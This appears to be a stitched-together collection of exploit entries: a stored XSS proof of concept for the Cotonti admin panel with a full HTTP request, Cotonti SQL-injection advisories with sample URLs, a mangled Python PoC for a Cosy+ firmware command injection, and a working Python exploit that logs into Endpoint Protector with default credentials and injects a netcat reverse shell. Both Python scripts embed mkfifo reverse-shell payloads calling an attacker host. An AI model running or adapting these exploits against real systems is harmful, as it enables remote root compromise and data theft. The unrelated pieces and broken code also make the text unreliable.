# Attack Pattern: "><img src=1 href=1 onerror="javascript:alert(1)"></img>
# Description
1) Enter the Admin Panel (vulnerableapplication.com/cotonti/admin.php)
2) Go to the Configuration tab and set the payload ("><img src=1 href=1 onerror="javascript:alert(1)"></img>) for the Site title parameter
3) Click the Update button
4) Finally, go to the home page; the triggered vulnerability is shown there
# Proof of Concepts
Request;
POST /cotonti/admin.php?m=config&n=edit&o=core&p=title&a=update HTTP/1.1
Host: vulnerableapplication.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101
Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 440
Origin: https://vulnerableapplication.com
Connection: close
Referer:
https://vulnerableapplication/cotonti/admin.php?m=config&n=edit&o=core&p=title
Cookie:
__cmpconsentx19318=CPH17mBPH17mBAfUmBENBeCsAP_AAH_AAAYgG9tf_X_fb3_j-_59__t0eY1f9_7_v-0zjheds-8Nyd_X_L8X_2M7vB36pr4KuR4ku3bBAQdtHOncTQmx6IlVqTPsb02Mr7NKJ7PEmlsbe2dYGH9_n9XT_ZKZ79_____7________77______3_v__9-BvbX_1_329_4_v-ff_7dHmNX_f-_7_tM44XnbPvDcnf1_y_F_9jO7wd-qa-CrkeJLt2wQEHbRzp3E0JseiJVakz7G9NjK-zSiezxJpbG3tnWBh_f5_V0_2Sme_f____-________--______9_7___fgAAA;
__cmpcccx19318=aBPH17mCgAADAAXAA0AB4AQ4DiQKnAAA;
_ga=GA1.2.1498194981.1623770561; _gid=GA1.2.1196246770.1623770561;
__gads=ID=63f33aa9dd32c83c-220723d35ec800e9:T=1623770613:RT=1623770613:S=ALNI_MZ0ifDGVpIXuopc8JXvo208SRTYmA;
PHPSESSID=ahmanvhckp2o5g5rnpr4cnj9c3
&x=701dad27076b1d78&maintitle=%22%3E%3Cimg+src%3D1+href%3D1+onerror%3D%22javascript%3Aalert(1)%22%3E%3C%2Fimg%3E&subtitle=Subtitle&metakeywords=&title_users_details=%7BUSER%7D%3A+%7BNAME%7D&title_header=%7BSUBTITLE%7D+-+%7BMAINTITLE%7D&title_header_index=%7BMAINTITLE%7D+-+%7BDESCRIPTION%7D&subject_mail=%7BSITE_TITLE%7D+-+%7BMAIL_SUBJECT%7D&body_mail=%7BMAIL_BODY%7D%0D%0A%0D%0A%7BSITE_TITLE%7D+-+%7BSITE_URL%7D%0D%0A%7BSITE_DESCRIPTION%7D
Response;
HTTP/1.1 200 OK
Date: Tue, 15 Jun 2021 16:07:59 GMT
Server: Apache
Expires: Mon, Apr 01 1974 00:00:00 GMT
Cache-Control: no-store,no-cache,must-revalidate, post-check=0,pre-check=0
Pragma: no-cache
Last-Modified: Tue, 15 Jun 2021 04:07:59 GMT
Vary: Accept-Encoding
X-Robots-Tag: noindex,nofollow
Content-Length: 4366
Connection: close
Content-Type: text/html; charset=UTF-8
<h1 class="body"><a href="admin.php" title="Administration
panel">Administration panel</a> / <a href="admin.php?m=config"
title="Configuration">Configuration</a> / <a
href="admin.php?m=config&n=edit&o=core&p=title" title="Titles
and Metas">Titles and Metas</a></h1>
<div id="main" class="body clear">
<h2>Configuration</h2>
<div class="done">
<h4>Done</h4>
<ul>
<li>Updated</li>
</ul>
</div>
source: https://www.securityfocus.com/bid/48028/info
Cotonti is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
Cotonti 0.9.2 is vulnerable; other versions may also be affected.
http://www.example.com/users.php?s=-2+AND+31337=0
http://www.example.com/forums.php?m=topics&s=offtopic&ord=-2+AND+31337=0
source: https://www.securityfocus.com/bid/54147/info
Cotonti is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
Cotonti 0.6.23 is vulnerable; other versions may also be affected.
http://www.example.com/admin.php?m=hits&f=year&v=1[SQLi]
# Exploit Title: Cosy+ firmware 21.2s7 - Command Injection
# Google Dork: N/A
# Date: 2024-8-20
# Exploit Author: CodeB0ss
# Contact: t.me/codeb0ss / uncodeboss@gmail.com
# Version: 21.2s7
# Tested on: Windows 11 Home Edition
# CVE: CVE-2024-33896
import socket
import subprocess
import time
# NOTE(review): this listing is whitespace-mangled in this copy (several
# statements run together on single lines), so it is not runnable as shown;
# the author's GitHub link below carries the original layout.
def configcreator(file_path):
with open(file_path, 'w') as f: f.write( """ client dev tun persist-tun
proto tcp verb 5 mute 20 --up '/bin/sh -c "TF=$(mktemp -u);mkfifo
$TF;telnet {attacker_ip} 5000 0<$TF | sh 1>$TF"' script-security 2 """) def
l3st(port): server_socket = socket.socket(socket.AF_INET,
socket.SOCK_STREAM) server_socket.bind(('0.0.0.0', port))
server_socket.listen(1) print(f" - --> Listening_0n_port {port}")
client_socket, _ = server_socket.accept() print(" - --> Recevied") while
True: data = client_socket.recv(1024) if not data: break
print(data.decode()) client_socket.close() server_socket.close() if name ==
"main": IP = '127.0.0.1' config = '/path/to/malicious_config.ovpn' port =
5000 listener_process = subprocess.Popen(['python', '-c', f'from main
import start_listener; start_listener({port})']) time.sleep(2)
create_malicious_openvpn_config(config) print(f" - --> config_created
{config}")
GitHub:
https://github.com/codeb0ss/CVE-2024-33896-PoC
Hey,
Overview: The Ewon Cosy+ is a VPN gateway used for remote access and
maintenance in industrial environments. The manufacturer describes the
product as follows (see [1]): "The Ewon Cosy+ gateway establishes a secure
VPN connection between the machine (PLC, HMI, or other devices) and the
remote engineer. The connection happens through Talk2m, a highly secured
industrial cloud service. The Ewon Cosy+ makes industrial remote access
easy and secure like never before!" Due to improper neutralization of
parameters read from a user-controlled configuration file, an authenticated
attacker is able to inject and execute OS commands on the device.
Vulnerability Details: Authenticated attackers are able to upload a custom
OpenVPN configuration. This configuration can contain the OpenVPN
parameters "--up" and "--down", which execute a specified script or
executable. Since the process itself runs with the highest privileges
(root), this allows the device to be completely compromised.
# Title : CoSoSys Endpoint Protector - Authenticated Remote Root Command Injection
# Date : Vulnerability submitted in 01/12/2017 and published in 01/08/2018
# Author : 0x09AL
# Tested on : Endpoint Protector 4.5.0.1
# Software Link : https://www.endpointprotector.com/
# Vulnerable Versions : Endpoint Protector <= 4.5.0.1
# Endpoint Protector suffers from an authenticated command injection vulnerability. By default the username and password are : root:epp2011
# In the Appliance tab, under Server Maintenance, the NTP Server field is vulnerable to command injection: there is a call to sh -c {NTP Server field} whose argument is not validated. Attached is the exploit, which does this automatically.
# The command may take a while to execute.
import requests
# Authenticated command-injection PoC for Endpoint Protector <= 4.5.0.1 (see
# header). Python 2 (print statements). Flow: log in, fetch the maintenance
# page for its CSRF token, then submit the timezone form with the NTP server
# field carrying a shell command. The 'x.x.x.x' values are placeholders.
# Indentation of the if/else bodies is flat in this copy.
exp = requests.session()
user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0' # defined but never sent: no request below sets a User-Agent header
username = 'root'
password = 'epp2011' # vendor default credentials, as stated in the header
host = 'x.x.x.x.x' # appliance address (placeholder)
rev_host = 'x.x.x.x' # reverse-shell listener (placeholder)
rev_port = '443'
# verify=False on every request disables TLS certificate validation
# (presumably because the appliance uses a self-signed certificate).
r = exp.post('https://%s/index.php/login' % host,data={'username':username,'password':password,'login':'Login'},verify=False)
# The value is prefixed with '&&' so it runs after the command the server
# builds with sh -c (header). Server-side fix: validate the NTP server as a
# hostname/IP and pass it as a separate argv element instead of through a
# shell. Detection: NTP server values containing shell metacharacters
# (&&, |, ;) in appliance configuration-change logs.
shell = 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc %s %s >/tmp/f' % (rev_host,rev_port)
payload = '&& %s' % shell
print payload
# Login success is inferred from page text: "Welcome Guest" still present
# means the credentials were rejected.
if(r.text.find("Welcome Guest")>0):
print "[-] Incorrect credentials [-]"
else:
print "[+] Logged in successfully [+]"
r = exp.get('https://%s/index.php/appliance/maintenance' % host,headers={'X-Requested-With': 'XMLHttpRequest'},verify=False)
if(r.text.find("csrf")>-1):
print "[+] Getting CSRF Token [+]"
# Takes the first value="..." attribute on the page and assumes it is the
# CSRF token field; fragile if the form layout changes.
csrf_token = r.text.split('value="')[1].split('">')[0]
print "[+] Token: %s [+]" % csrf_token
post_data = {
'csrf_token' : csrf_token,
'continent' :'Europe',
'region' :'Berlin',
'timeSetting[ntpserver]' : payload,
'timeSetting[timesync]' :'12'
}
r = exp.post('https://%s/index.php/appliance/timezone' % host,data=post_data,headers={'X-Requested-With': 'XMLHttpRequest','Referer': 'https://%s/index.php/' % host},verify=False)
print "[+] Sending exploit [+]"
# Very loose check: any "nc" substring in the response body passes. The
# endpoint is then posted a second time with the bare 'ntpserver' field
# name and no CSRF token.
if(r.text.find("nc")>-1):
post_data = {
'ntpserver': payload,
'continent' :'Europe',
'region' :'Berlin'
}
r = exp.post('https://%s/index.php/appliance/timezone' % host,data=post_data,headers={'X-Requested-With': 'XMLHttpRequest','Referer': 'https://%s/index.php/' % host},verify=False)
print "[+] Exploit success [+]"